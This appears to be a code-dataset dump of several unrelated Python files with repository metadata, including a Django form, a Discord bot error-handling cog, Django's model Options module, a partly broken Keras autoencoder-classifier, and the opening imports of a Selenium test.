class SampleForm(ModelForm):
class Meta:
model = MatchRecord
fields = [
'game_name',
'game_date',
'my_title',
'opp_title',
'win_lose',
'comment',
'frirst_strike',
'battle_division'
]
widgets = {
'game_date': DateInput(),
'comment':forms.Textarea(attrs={'rows':4,})
}
|
[
"yshstny102@gmail.com"
] |
yshstny102@gmail.com
|
a94e1bb1dc306e6a03ea0107933cb542bdaea003
|
50671b3e4e8ed7e9702c9941bb71fdbf92dffbe6
|
/src/cogs/events.py
|
0b28700d34057dbeef8be93aeb3c40ea8a08314b
|
[] |
no_license
|
pikoUsername/Emulator
|
3dd67d0d3934c2ec9283b9b52edebec31c654326
|
96e6563c7cbcea051e4e41a377d917a2a9f5528a
|
refs/heads/main
| 2023-02-27T22:42:43.154987
| 2021-02-09T14:51:56
| 2021-02-09T14:51:56
| 321,045,486
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,199
|
py
|
import os
import sys
from discord.ext import commands
from discord.ext.commands import errors
import discord
from loguru import logger
from ..models import Guild
from ..utils.notify import notify_all_owners
class DiscordEvents(commands.Cog, name="Events"):
__slots__ = "bot",
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
if os.environ.get("notify_admins"):
await notify_all_owners(self.bot, text="BOT STARTED")
@commands.Cog.listener()
async def on_guild_join(self, guild: discord.Guild):
g = await Guild.query.where(guild.id == Guild.guild_id).gino.first()
g.add_guild(guild)
@commands.Cog.listener()
async def on_guild_remove(self, guild: discord.Guild):
await self.bot.fm.delete_all_guild_files(guild.id)
g = await Guild.get_guild(guild.id)
await g.delete()
logger.info("leaved and deleted thats guild folder")
@commands.Cog.listener()
async def on_command_error(self, ctx, err):
if isinstance(err, errors.MissingRequiredArgument) or isinstance(err, errors.BadArgument):
helper = str(ctx.invoked_subcommand) if ctx.invoked_subcommand else str(ctx.command)
await ctx.send_help(helper)
elif isinstance(err, errors.CommandInvokeError):
logger.exception(f"{err}, {sys.exc_info()}")
if "2000 or fewer" in str(err) and len(ctx.message.clean_content) > 1900:
return await ctx.send(
"You attempted to make the command display more than 2,000 characters...\n"
"Both error and command will be ignored."
)
await ctx.send(embed=discord.Embed(
title="Error on processing Command",
description=f"```{err}```",
), delete_after=30)
elif isinstance(err, errors.MissingPermissions):
await ctx.send(embed=discord.Embed(
title=f"Fail {self.bot.X_EMOJI}",
description="Permission ERROR"))
elif isinstance(err, errors.CheckFailure):
await ctx.send(embed=discord.Embed(
title=f"Fail {self.bot.X_EMOJI}",
description="You cant made this"))
elif isinstance(err, errors.MaxConcurrencyReached):
await ctx.send(
"You've reached max capacity of command usage at once, please finish the previous one...",
delete_after=30)
elif isinstance(err, errors.CommandOnCooldown):
await ctx.send(
f"This command is on cool down... try again in {err.retry_after:.2f} seconds.",
delete_after=30)
elif isinstance(err, errors.CommandNotFound):
pass
elif isinstance(err, errors.NoPrivateMessage):
await ctx.send(
embed=discord.Embed(title="Private message Not work",
description="Bot work only in guild channels"))
else:
logger.exception(err)
await self.bot.send_error(ctx, err)
def setup(bot):
bot.add_cog(DiscordEvents(bot))
|
[
"galymzhan.amantaj@gmail.com"
] |
galymzhan.amantaj@gmail.com
|
bac7da100bdffb4311f4f9773f9d16c5da4d46e5
|
6e3843071082065f7ab638af2928813be44ad97b
|
/virtual/lib/python3.6/site-packages/django/db/models/options.py
|
b64987a3a0ea3f486ba438a28eabd553908ce7e6
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
Ingabineza12/awwwards
|
ebf3d8e21662d491b78ee5db28543e7a09ca8f0a
|
5fe83ed0820e47617f32b28a3f6f5e5a4f27e47b
|
refs/heads/master
| 2023-02-22T10:23:33.887887
| 2021-01-25T07:37:47
| 2021-01-25T07:37:47
| 331,918,339
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 36,854
|
py
|
from __future__ import unicode_literals
import copy
import warnings
from bisect import bisect
from collections import OrderedDict, defaultdict
from itertools import chain
from django.apps import apps
from django.conf import settings
from django.core.exceptions import FieldDoesNotExist
from django.db import connections
from django.db.models import Manager
from django.db.models.fields import AutoField
from django.db.models.fields.proxy import OrderWrt
from django.db.models.query_utils import PathInfo
from django.utils import six
from django.utils.datastructures import ImmutableList, OrderedSet
from django.utils.deprecation import (
RemovedInDjango20Warning, RemovedInDjango21Warning,
warn_about_renamed_method,
)
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.utils.functional import cached_property
from django.utils.text import camel_case_to_spaces, format_lazy
from django.utils.translation import override
NOT_PROVIDED = object()
PROXY_PARENTS = object()
EMPTY_RELATION_TREE = tuple()
IMMUTABLE_WARNING = (
"The return type of '%s' should never be mutated. If you want to manipulate this list "
"for your own use, make a copy first."
)
DEFAULT_NAMES = (
'verbose_name', 'verbose_name_plural', 'db_table', 'ordering',
'unique_together', 'permissions', 'get_latest_by', 'order_with_respect_to',
'app_label', 'db_tablespace', 'abstract', 'managed', 'proxy', 'swappable',
'auto_created', 'index_together', 'apps', 'default_permissions',
'select_on_save', 'default_related_name', 'required_db_features',
'required_db_vendor', 'base_manager_name', 'default_manager_name',
'manager_inheritance_from_future', 'indexes',
)
def normalize_together(option_together):
"""
option_together can be either a tuple of tuples, or a single
tuple of two strings. Normalize it to a tuple of tuples, so that
calling code can uniformly expect that.
"""
try:
if not option_together:
return ()
if not isinstance(option_together, (tuple, list)):
raise TypeError
first_element = next(iter(option_together))
if not isinstance(first_element, (tuple, list)):
option_together = (option_together,)
# Normalize everything to tuples
return tuple(tuple(ot) for ot in option_together)
except TypeError:
# If the value of option_together isn't valid, return it
# verbatim; this will be picked up by the check framework later.
return option_together
def make_immutable_fields_list(name, data):
return ImmutableList(data, warning=IMMUTABLE_WARNING % name)
@python_2_unicode_compatible
class Options(object):
FORWARD_PROPERTIES = {
'fields', 'many_to_many', 'concrete_fields', 'local_concrete_fields',
'_forward_fields_map', 'managers', 'managers_map', 'base_manager',
'default_manager',
}
REVERSE_PROPERTIES = {'related_objects', 'fields_map', '_relation_tree'}
default_apps = apps
def __init__(self, meta, app_label=None):
self._get_fields_cache = {}
self.local_fields = []
self.local_many_to_many = []
self.private_fields = []
self.manager_inheritance_from_future = False
self.local_managers = []
self.base_manager_name = None
self.default_manager_name = None
self.model_name = None
self.verbose_name = None
self.verbose_name_plural = None
self.db_table = ''
self.ordering = []
self._ordering_clash = False
self.indexes = []
self.unique_together = []
self.index_together = []
self.select_on_save = False
self.default_permissions = ('add', 'change', 'delete')
self.permissions = []
self.object_name = None
self.app_label = app_label
self.get_latest_by = None
self.order_with_respect_to = None
self.db_tablespace = settings.DEFAULT_TABLESPACE
self.required_db_features = []
self.required_db_vendor = None
self.meta = meta
self.pk = None
self.auto_field = None
self.abstract = False
self.managed = True
self.proxy = False
# For any class that is a proxy (including automatically created
# classes for deferred object loading), proxy_for_model tells us
# which class this model is proxying. Note that proxy_for_model
# can create a chain of proxy models. For non-proxy models, the
# variable is always None.
self.proxy_for_model = None
# For any non-abstract class, the concrete class is the model
# in the end of the proxy_for_model chain. In particular, for
# concrete models, the concrete_model is always the class itself.
self.concrete_model = None
self.swappable = None
self.parents = OrderedDict()
self.auto_created = False
# List of all lookups defined in ForeignKey 'limit_choices_to' options
# from *other* models. Needed for some admin checks. Internal use only.
self.related_fkey_lookups = []
# A custom app registry to use, if you're making a separate model set.
self.apps = self.default_apps
self.default_related_name = None
@property
def label(self):
return '%s.%s' % (self.app_label, self.object_name)
@property
def label_lower(self):
return '%s.%s' % (self.app_label, self.model_name)
@property
def app_config(self):
# Don't go through get_app_config to avoid triggering imports.
return self.apps.app_configs.get(self.app_label)
@property
def installed(self):
return self.app_config is not None
def contribute_to_class(self, cls, name):
from django.db import connection
from django.db.backends.utils import truncate_name
cls._meta = self
self.model = cls
# First, construct the default values for these options.
self.object_name = cls.__name__
self.model_name = self.object_name.lower()
self.verbose_name = camel_case_to_spaces(self.object_name)
# Store the original user-defined values for each option,
# for use when serializing the model definition
self.original_attrs = {}
# Next, apply any overridden values from 'class Meta'.
if self.meta:
meta_attrs = self.meta.__dict__.copy()
for name in self.meta.__dict__:
# Ignore any private attributes that Django doesn't care about.
# NOTE: We can't modify a dictionary's contents while looping
# over it, so we loop over the *original* dictionary instead.
if name.startswith('_'):
del meta_attrs[name]
for attr_name in DEFAULT_NAMES:
if attr_name in meta_attrs:
setattr(self, attr_name, meta_attrs.pop(attr_name))
self.original_attrs[attr_name] = getattr(self, attr_name)
elif hasattr(self.meta, attr_name):
setattr(self, attr_name, getattr(self.meta, attr_name))
self.original_attrs[attr_name] = getattr(self, attr_name)
self.unique_together = normalize_together(self.unique_together)
self.index_together = normalize_together(self.index_together)
# verbose_name_plural is a special case because it uses a 's'
# by default.
if self.verbose_name_plural is None:
self.verbose_name_plural = format_lazy('{}s', self.verbose_name)
# order_with_respect_and ordering are mutually exclusive.
self._ordering_clash = bool(self.ordering and self.order_with_respect_to)
# Any leftover attributes must be invalid.
# if meta_attrs != {}:
# raise TypeError("'class Meta' got invalid attribute(s): %s" % ','.join(meta_attrs.keys()))
else:
self.verbose_name_plural = format_lazy('{}s', self.verbose_name)
del self.meta
# If the db_table wasn't provided, use the app_label + model_name.
if not self.db_table:
self.db_table = "%s_%s" % (self.app_label, self.model_name)
self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())
def _prepare(self, model):
if self.order_with_respect_to:
# The app registry will not be ready at this point, so we cannot
# use get_field().
query = self.order_with_respect_to
try:
self.order_with_respect_to = next(
f for f in self._get_fields(reverse=False)
if f.name == query or f.attname == query
)
except StopIteration:
raise FieldDoesNotExist("%s has no field named '%s'" % (self.object_name, query))
self.ordering = ('_order',)
if not any(isinstance(field, OrderWrt) for field in model._meta.local_fields):
model.add_to_class('_order', OrderWrt())
else:
self.order_with_respect_to = None
if self.pk is None:
if self.parents:
# Promote the first parent link in lieu of adding yet another
# field.
field = next(six.itervalues(self.parents))
# Look for a local field with the same name as the
# first parent link. If a local field has already been
# created, use it instead of promoting the parent
already_created = [fld for fld in self.local_fields if fld.name == field.name]
if already_created:
field = already_created[0]
field.primary_key = True
self.setup_pk(field)
if not field.remote_field.parent_link:
warnings.warn(
'Add parent_link=True to %s as an implicit link is '
'deprecated.' % field, RemovedInDjango20Warning
)
else:
auto = AutoField(verbose_name='ID', primary_key=True, auto_created=True)
model.add_to_class('id', auto)
def add_manager(self, manager):
self.local_managers.append(manager)
self._expire_cache()
def add_field(self, field, private=False, virtual=NOT_PROVIDED):
if virtual is not NOT_PROVIDED:
warnings.warn(
"The `virtual` argument of Options.add_field() has been renamed to `private`.",
RemovedInDjango20Warning, stacklevel=2
)
private = virtual
# Insert the given field in the order in which it was created, using
# the "creation_counter" attribute of the field.
# Move many-to-many related fields from self.fields into
# self.many_to_many.
if private:
self.private_fields.append(field)
elif field.is_relation and field.many_to_many:
self.local_many_to_many.insert(bisect(self.local_many_to_many, field), field)
else:
self.local_fields.insert(bisect(self.local_fields, field), field)
self.setup_pk(field)
# If the field being added is a relation to another known field,
# expire the cache on this field and the forward cache on the field
# being referenced, because there will be new relationships in the
# cache. Otherwise, expire the cache of references *to* this field.
# The mechanism for getting at the related model is slightly odd -
# ideally, we'd just ask for field.related_model. However, related_model
# is a cached property, and all the models haven't been loaded yet, so
# we need to make sure we don't cache a string reference.
if field.is_relation and hasattr(field.remote_field, 'model') and field.remote_field.model:
try:
field.remote_field.model._meta._expire_cache(forward=False)
except AttributeError:
pass
self._expire_cache()
else:
self._expire_cache(reverse=False)
def setup_pk(self, field):
if not self.pk and field.primary_key:
self.pk = field
field.serialize = False
def setup_proxy(self, target):
"""
Does the internal setup so that the current model is a proxy for
"target".
"""
self.pk = target._meta.pk
self.proxy_for_model = target
self.db_table = target._meta.db_table
def __repr__(self):
return '<Options for %s>' % self.object_name
def __str__(self):
return "%s.%s" % (self.app_label, self.model_name)
def can_migrate(self, connection):
"""
Return True if the model can/should be migrated on the `connection`.
`connection` can be either a real connection or a connection alias.
"""
if self.proxy or self.swapped or not self.managed:
return False
if isinstance(connection, six.string_types):
connection = connections[connection]
if self.required_db_vendor:
return self.required_db_vendor == connection.vendor
if self.required_db_features:
return all(getattr(connection.features, feat, False)
for feat in self.required_db_features)
return True
@property
def verbose_name_raw(self):
"""
There are a few places where the untranslated verbose name is needed
(so that we get the same value regardless of currently active
locale).
"""
with override(None):
return force_text(self.verbose_name)
@property
def swapped(self):
"""
Has this model been swapped out for another? If so, return the model
name of the replacement; otherwise, return None.
For historical reasons, model name lookups using get_model() are
case insensitive, so we make sure we are case insensitive here.
"""
if self.swappable:
swapped_for = getattr(settings, self.swappable, None)
if swapped_for:
try:
swapped_label, swapped_object = swapped_for.split('.')
except ValueError:
# setting not in the format app_label.model_name
# raising ImproperlyConfigured here causes problems with
# test cleanup code - instead it is raised in get_user_model
# or as part of validation.
return swapped_for
if '%s.%s' % (swapped_label, swapped_object.lower()) != self.label_lower:
return swapped_for
return None
@cached_property
def managers(self):
managers = []
seen_managers = set()
bases = (b for b in self.model.mro() if hasattr(b, '_meta'))
for depth, base in enumerate(bases):
for manager in base._meta.local_managers:
if manager.name in seen_managers:
continue
manager = copy.copy(manager)
manager.model = self.model
seen_managers.add(manager.name)
managers.append((depth, manager.creation_counter, manager))
# Used for deprecation of legacy manager inheritance,
# remove afterwards. (RemovedInDjango20Warning)
manager._originating_model = base
return make_immutable_fields_list(
"managers",
(m[2] for m in sorted(managers)),
)
@cached_property
def managers_map(self):
return {manager.name: manager for manager in self.managers}
@cached_property
def base_manager(self):
base_manager_name = self.base_manager_name
if not base_manager_name:
# Get the first parent's base_manager_name if there's one.
for parent in self.model.mro()[1:]:
if hasattr(parent, '_meta'):
if parent._base_manager.name != '_base_manager':
base_manager_name = parent._base_manager.name
break
if base_manager_name:
try:
return self.managers_map[base_manager_name]
except KeyError:
raise ValueError(
"%s has no manager named %r" % (
self.object_name,
base_manager_name,
)
)
# Deprecation shim for `use_for_related_fields`.
for i, base_manager_class in enumerate(self.default_manager.__class__.mro()):
if getattr(base_manager_class, 'use_for_related_fields', False):
if not getattr(base_manager_class, 'silence_use_for_related_fields_deprecation', False):
warnings.warn(
"use_for_related_fields is deprecated, instead "
"set Meta.base_manager_name on '{}'.".format(self.model._meta.label),
RemovedInDjango20Warning, 2
)
if i == 0:
manager = self.default_manager
else:
manager = base_manager_class()
manager.name = '_base_manager'
manager.model = self.model
return manager
manager = Manager()
manager.name = '_base_manager'
manager.model = self.model
manager.auto_created = True
return manager
@cached_property
def default_manager(self):
default_manager_name = self.default_manager_name
if not default_manager_name and not self.local_managers:
# Get the first parent's default_manager_name if there's one.
for parent in self.model.mro()[1:]:
if hasattr(parent, '_meta'):
default_manager_name = parent._meta.default_manager_name
break
if default_manager_name:
try:
return self.managers_map[default_manager_name]
except KeyError:
raise ValueError(
"%s has no manager named %r" % (
self.object_name,
default_manager_name,
)
)
if self.managers:
return self.managers[0]
@cached_property
def fields(self):
"""
Returns a list of all forward fields on the model and its parents,
excluding ManyToManyFields.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
# For legacy reasons, the fields property should only contain forward
# fields that are not private or with a m2m cardinality. Therefore we
# pass these three filters as filters to the generator.
# The third lambda is a longwinded way of checking f.related_model - we don't
# use that property directly because related_model is a cached property,
# and all the models may not have been loaded yet; we don't want to cache
# the string reference to the related_model.
def is_not_an_m2m_field(f):
return not (f.is_relation and f.many_to_many)
def is_not_a_generic_relation(f):
return not (f.is_relation and f.one_to_many)
def is_not_a_generic_foreign_key(f):
return not (
f.is_relation and f.many_to_one and not (hasattr(f.remote_field, 'model') and f.remote_field.model)
)
return make_immutable_fields_list(
"fields",
(f for f in self._get_fields(reverse=False)
if is_not_an_m2m_field(f) and is_not_a_generic_relation(f) and is_not_a_generic_foreign_key(f))
)
@cached_property
def concrete_fields(self):
"""
Returns a list of all concrete fields on the model and its parents.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
return make_immutable_fields_list(
"concrete_fields", (f for f in self.fields if f.concrete)
)
@property
@warn_about_renamed_method(
'Options', 'virtual_fields', 'private_fields',
RemovedInDjango20Warning
)
def virtual_fields(self):
return self.private_fields
@cached_property
def local_concrete_fields(self):
"""
Returns a list of all concrete fields on the model.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
return make_immutable_fields_list(
"local_concrete_fields", (f for f in self.local_fields if f.concrete)
)
@cached_property
def many_to_many(self):
"""
Returns a list of all many to many fields on the model and its parents.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this list.
"""
return make_immutable_fields_list(
"many_to_many",
(f for f in self._get_fields(reverse=False) if f.is_relation and f.many_to_many)
)
@cached_property
def related_objects(self):
"""
Returns all related objects pointing to the current model. The related
objects can come from a one-to-one, one-to-many, or many-to-many field
relation type.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
all_related_fields = self._get_fields(forward=False, reverse=True, include_hidden=True)
return make_immutable_fields_list(
"related_objects",
(obj for obj in all_related_fields if not obj.hidden or obj.field.many_to_many)
)
@cached_property
def _forward_fields_map(self):
res = {}
fields = self._get_fields(reverse=False)
for field in fields:
res[field.name] = field
# Due to the way Django's internals work, get_field() should also
# be able to fetch a field by attname. In the case of a concrete
# field with relation, includes the *_id name too
try:
res[field.attname] = field
except AttributeError:
pass
return res
@cached_property
def fields_map(self):
res = {}
fields = self._get_fields(forward=False, include_hidden=True)
for field in fields:
res[field.name] = field
# Due to the way Django's internals work, get_field() should also
# be able to fetch a field by attname. In the case of a concrete
# field with relation, includes the *_id name too
try:
res[field.attname] = field
except AttributeError:
pass
return res
def get_field(self, field_name):
"""
Return a field instance given the name of a forward or reverse field.
"""
try:
# In order to avoid premature loading of the relation tree
# (expensive) we prefer checking if the field is a forward field.
return self._forward_fields_map[field_name]
except KeyError:
# If the app registry is not ready, reverse fields are
# unavailable, therefore we throw a FieldDoesNotExist exception.
if not self.apps.models_ready:
raise FieldDoesNotExist(
"%s has no field named '%s'. The app cache isn't ready yet, "
"so if this is an auto-created related field, it won't "
"be available yet." % (self.object_name, field_name)
)
try:
# Retrieve field instance by name from cached or just-computed
# field map.
return self.fields_map[field_name]
except KeyError:
raise FieldDoesNotExist("%s has no field named '%s'" % (self.object_name, field_name))
def get_base_chain(self, model):
"""
Return a list of parent classes leading to `model` (ordered from
closest to most distant ancestor). This has to handle the case where
`model` is a grandparent or even more distant relation.
"""
if not self.parents:
return []
if model in self.parents:
return [model]
for parent in self.parents:
res = parent._meta.get_base_chain(model)
if res:
res.insert(0, parent)
return res
return []
def get_parent_list(self):
"""
Returns all the ancestors of this model as a list ordered by MRO.
Useful for determining if something is an ancestor, regardless of lineage.
"""
result = OrderedSet(self.parents)
for parent in self.parents:
for ancestor in parent._meta.get_parent_list():
result.add(ancestor)
return list(result)
def get_ancestor_link(self, ancestor):
"""
Returns the field on the current model which points to the given
"ancestor". This is possible an indirect link (a pointer to a parent
model, which points, eventually, to the ancestor). Used when
constructing table joins for model inheritance.
Returns None if the model isn't an ancestor of this one.
"""
if ancestor in self.parents:
return self.parents[ancestor]
for parent in self.parents:
# Tries to get a link field from the immediate parent
parent_link = parent._meta.get_ancestor_link(ancestor)
if parent_link:
# In case of a proxied model, the first link
# of the chain to the ancestor is that parent
# links
return self.parents[parent] or parent_link
def get_path_to_parent(self, parent):
"""
Return a list of PathInfos containing the path from the current
model to the parent model, or an empty list if parent is not a
parent of the current model.
"""
if self.model is parent:
return []
# Skip the chain of proxy to the concrete proxied model.
proxied_model = self.concrete_model
path = []
opts = self
for int_model in self.get_base_chain(parent):
if int_model is proxied_model:
opts = int_model._meta
else:
final_field = opts.parents[int_model]
targets = (final_field.remote_field.get_related_field(),)
opts = int_model._meta
path.append(PathInfo(final_field.model._meta, opts, targets, final_field, False, True))
return path
def get_path_from_parent(self, parent):
"""
Return a list of PathInfos containing the path from the parent
model to the current model, or an empty list if parent is not a
parent of the current model.
"""
if self.model is parent:
return []
model = self.concrete_model
# Get a reversed base chain including both the current and parent
# models.
chain = model._meta.get_base_chain(parent)
chain.reverse()
chain.append(model)
# Construct a list of the PathInfos between models in chain.
path = []
for i, ancestor in enumerate(chain[:-1]):
child = chain[i + 1]
link = child._meta.get_ancestor_link(ancestor)
path.extend(link.get_reverse_path_info())
return path
def _populate_directed_relation_graph(self):
"""
This method is used by each model to find its reverse objects. As this
method is very expensive and is accessed frequently (it looks up every
field in a model, in every app), it is computed on first access and then
is set as a property on every model.
"""
related_objects_graph = defaultdict(list)
all_models = self.apps.get_models(include_auto_created=True)
for model in all_models:
opts = model._meta
# Abstract model's fields are copied to child models, hence we will
# see the fields from the child models.
if opts.abstract:
continue
fields_with_relations = (
f for f in opts._get_fields(reverse=False, include_parents=False)
if f.is_relation and f.related_model is not None
)
for f in fields_with_relations:
if not isinstance(f.remote_field.model, six.string_types):
related_objects_graph[f.remote_field.model._meta.concrete_model._meta].append(f)
for model in all_models:
# Set the relation_tree using the internal __dict__. In this way
# we avoid calling the cached property. In attribute lookup,
# __dict__ takes precedence over a data descriptor (such as
# @cached_property). This means that the _meta._relation_tree is
# only called if related_objects is not in __dict__.
related_objects = related_objects_graph[model._meta.concrete_model._meta]
model._meta.__dict__['_relation_tree'] = related_objects
# It seems it is possible that self is not in all_models, so guard
# against that with default for get().
return self.__dict__.get('_relation_tree', EMPTY_RELATION_TREE)
@cached_property
def _relation_tree(self):
return self._populate_directed_relation_graph()
def _expire_cache(self, forward=True, reverse=True):
# This method is usually called by apps.cache_clear(), when the
# registry is finalized, or when a new field is added.
if forward:
for cache_key in self.FORWARD_PROPERTIES:
if cache_key in self.__dict__:
delattr(self, cache_key)
if reverse and not self.abstract:
for cache_key in self.REVERSE_PROPERTIES:
if cache_key in self.__dict__:
delattr(self, cache_key)
self._get_fields_cache = {}
def get_fields(self, include_parents=True, include_hidden=False):
"""
Returns a list of fields associated to the model. By default, includes
forward and reverse fields, fields derived from inheritance, but not
hidden fields. The returned fields can be changed using the parameters:
- include_parents: include fields derived from inheritance
- include_hidden: include fields that have a related_name that
starts with a "+"
"""
if include_parents is False:
include_parents = PROXY_PARENTS
return self._get_fields(include_parents=include_parents, include_hidden=include_hidden)
def _get_fields(self, forward=True, reverse=True, include_parents=True, include_hidden=False,
seen_models=None):
"""
Internal helper function to return fields of the model.
* If forward=True, then fields defined on this model are returned.
* If reverse=True, then relations pointing to this model are returned.
* If include_hidden=True, then fields with is_hidden=True are returned.
* The include_parents argument toggles if fields from parent models
should be included. It has three values: True, False, and
PROXY_PARENTS. When set to PROXY_PARENTS, the call will return all
fields defined for the current model or any of its parents in the
parent chain to the model's concrete model.
"""
if include_parents not in (True, False, PROXY_PARENTS):
raise TypeError("Invalid argument for include_parents: %s" % (include_parents,))
# This helper function is used to allow recursion in ``get_fields()``
# implementation and to provide a fast way for Django's internals to
# access specific subsets of fields.
# We must keep track of which models we have already seen. Otherwise we
# could include the same field multiple times from different models.
topmost_call = False
if seen_models is None:
seen_models = set()
topmost_call = True
seen_models.add(self.model)
# Creates a cache key composed of all arguments
cache_key = (forward, reverse, include_parents, include_hidden, topmost_call)
try:
# In order to avoid list manipulation. Always return a shallow copy
# of the results.
return self._get_fields_cache[cache_key]
except KeyError:
pass
fields = []
# Recursively call _get_fields() on each parent, with the same
# options provided in this call.
if include_parents is not False:
for parent in self.parents:
# In diamond inheritance it is possible that we see the same
# model from two different routes. In that case, avoid adding
# fields from the same parent again.
if parent in seen_models:
continue
if (parent._meta.concrete_model != self.concrete_model and
include_parents == PROXY_PARENTS):
continue
for obj in parent._meta._get_fields(
forward=forward, reverse=reverse, include_parents=include_parents,
include_hidden=include_hidden, seen_models=seen_models):
if getattr(obj, 'parent_link', False) and obj.model != self.concrete_model:
continue
fields.append(obj)
if reverse and not self.proxy:
# Tree is computed once and cached until the app cache is expired.
# It is composed of a list of fields pointing to the current model
# from other models.
all_fields = self._relation_tree
for field in all_fields:
# If hidden fields should be included or the relation is not
# intentionally hidden, add to the fields dict.
if include_hidden or not field.remote_field.hidden:
fields.append(field.remote_field)
if forward:
fields.extend(
field for field in chain(self.local_fields, self.local_many_to_many)
)
# Private fields are recopied to each child model, and they get a
# different model as field.model in each child. Hence we have to
# add the private fields separately from the topmost call. If we
# did this recursively similar to local_fields, we would get field
# instances with field.model != self.model.
if topmost_call:
fields.extend(
f for f in self.private_fields
)
# In order to avoid list manipulation. Always
# return a shallow copy of the results
fields = make_immutable_fields_list("get_fields()", fields)
# Store result into cache for later access
self._get_fields_cache[cache_key] = fields
return fields
@property
def has_auto_field(self):
warnings.warn(
'Model._meta.has_auto_field is deprecated in favor of checking if '
'Model._meta.auto_field is not None.',
RemovedInDjango21Warning, stacklevel=2
)
return self.auto_field is not None
@has_auto_field.setter
def has_auto_field(self, value):
pass
@cached_property
def _property_names(self):
"""Return a set of the names of the properties defined on the model."""
names = []
for name in dir(self.model):
try:
attr = getattr(self.model, name)
except AttributeError:
pass
else:
if isinstance(attr, property):
names.append(name)
return frozenset(names)
|
[
"ingabineza@gmail.com"
] |
ingabineza@gmail.com
|
e9aea849891f25c699869356243ba071ec8daf04
|
3aabf076ca0f31c69948ccb34151488bec6e1e3e
|
/terra/classifier.py
|
16ead567f316c48b3749cc50ebe244812ab24d0c
|
[
"MIT"
] |
permissive
|
siddharthvaria/GI-DL
|
2e4af5dada42cefaa8e19137963b0a4675025011
|
715b5fe4426d737ed1b23ffbb812058a90433682
|
refs/heads/master
| 2021-09-14T16:07:41.572158
| 2018-05-15T22:39:20
| 2018-05-15T22:39:20
| 94,111,739
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,968
|
py
|
from keras.models import Model, load_model
from keras.layers import Input, LSTM, Dense, RepeatVector
# autoencoder/encoder + classifier for tweets
class Classifier:
def __init__(self, timesteps, input_dim=1, latent_dim=100,
elayers=3, dlayers=3, clayers=3):
ainputs = Input(shape=(timesteps, input_dim))
cinputs = Input(shape=(timesteps, input_dim))
# create encoding subnet
encoded = LSTM(latent_dim, return_sequences=True)
# for l in range(1, elayers):
# encoded = LSTM(latent_dim)(encoded)
# create decoding subnet
decoded = RepeatVector(timesteps)(LSTM(latent_dim)(encoded(ainputs)))
decoded = LSTM(input_dim, return_sequences=True)(decoded)
# for l in range(1, dlayers):
# decoded = LSTM(input_dim, return_sequences=True)(decoded)
# set up autoencoder model
self.autoencoder = Model(ainputs, decoded)
# create and set up classifier
classified = LSTM(128)(encoded(cinputs))
# for l in range(1, clayers):
# classified = LSTM(128)(classified)
classified = Dense(3, activation='softmax')
self.classifier = Model(cinputs, classified)
# compile models
self.autoencoder.compile(loss='binary_crossentropy',
optimizer='adam')
self.classifier.compile(loss='categorical_crossentropy',
optimizer='adam')
# def __init__(self, auto, classif):
# self.autoencoder = load_model(auto)
# self.classifier = load_model(classif)
def save(self, auto_out, classif_out):
self.autoencoder.save_weights(auto_out)
self.classifier.save_weights(classif_out)
def fit_auto(X):
self.autoencoder.fit(X, X)
def fit_classif(X, y):
self.classifier.fit(X, y)
def evaluate(X, y):
self.classifier.evaluate(X, y)
def predict(X):
return self.classifier.predict(X)
# a variational version
# TODO: make variational!
class VClassifier:
def __init__(self, batch_size,
input_dim=1, intermediate_dim=50, latent_dim=100,
elayers=3, dlayers=3, clayers=3):
ainputs = Input(shape=(timesteps, input_dim))
cinputs = Input(shape=(timesteps, input_dim))
# create encoding subnet
encoded = LSTM(latent_dim)
for l in range(1, elayers):
encoded = LSTM(latent_dim)(encoded)
# create decoding subnet
decoded = RepeatVector(timesteps)(encoded(ainputs))
decoded = LSTM(input_dim, return_sequences=True)(decoded)
for l in range(1, dlayers):
decoded = LSTM(input_dim, return_sequences=True)(decoded)
# set up autoencoder model
self.autoencoder = Model(ainputs, decoded)
# create and set up classifier
classified = LSTM(128)(encoded(cinputs))
for l in range(1, clayers):
classified = LSTM(128)(classified)
classified = Dense(3, activation='softmax')
self.classifier = Model(cinputs, classified)
# compile models
self.autoencoder.compile(loss='binary_crossentropy',
optimizer='adam')
self.classifier.compile(loss='categorical_crossentropy',
optimizer='adam')
def __init__(self, auto, classif):
self.autoencoder = load_model(auto)
self.classifier = load_model(classif)
def save(self, auto_out, classif_out):
self.autoencoder.save_weights(auto_out)
self.classifier.save_weights(classif_out)
def fit_auto(X):
self.autoencoder.fit(X, X)
def fit_classif(X, y):
self.classifier.fit(X, y)
def evaluate(X, y):
self.classifier.evaluate(X, y)
def predict(X):
return self.classifier.predict(X)
|
[
"fl2301@columbia.edu"
] |
fl2301@columbia.edu
|
6fc2e9842a862e151818555c40bd68c1fe986ae7
|
aa5d98396184ab9dc479075b37a3664c385de027
|
/tests/selenium/breadcrumb_test.py
|
8ae1041e04352b0b8d70180fdda1d4cfface3872
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
uk-gov-mirror/ONSdigital.sbr-ui
|
c6a66cd6982e9e98a991eadbb8cef0f1fb6ba2bf
|
48bbfdc59e393dd4d2d008b8414ac96d2e2be44f
|
refs/heads/master
| 2021-10-12T00:02:34.160448
| 2018-10-17T14:59:04
| 2018-10-17T14:59:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,910
|
py
|
import unittest
from selenium import webdriver
from tests.helper_methods import create_selenium_config
from tests.constants import BASE_URL, SEARCH_URL
from tests.constants import ENTERPRISE, LOCAL_UNIT, REPORTING_UNIT, LEGAL_UNIT, COMPANY_HOUSE, VALUE_ADDED_TAX, PAY_AS_YOU_EARN
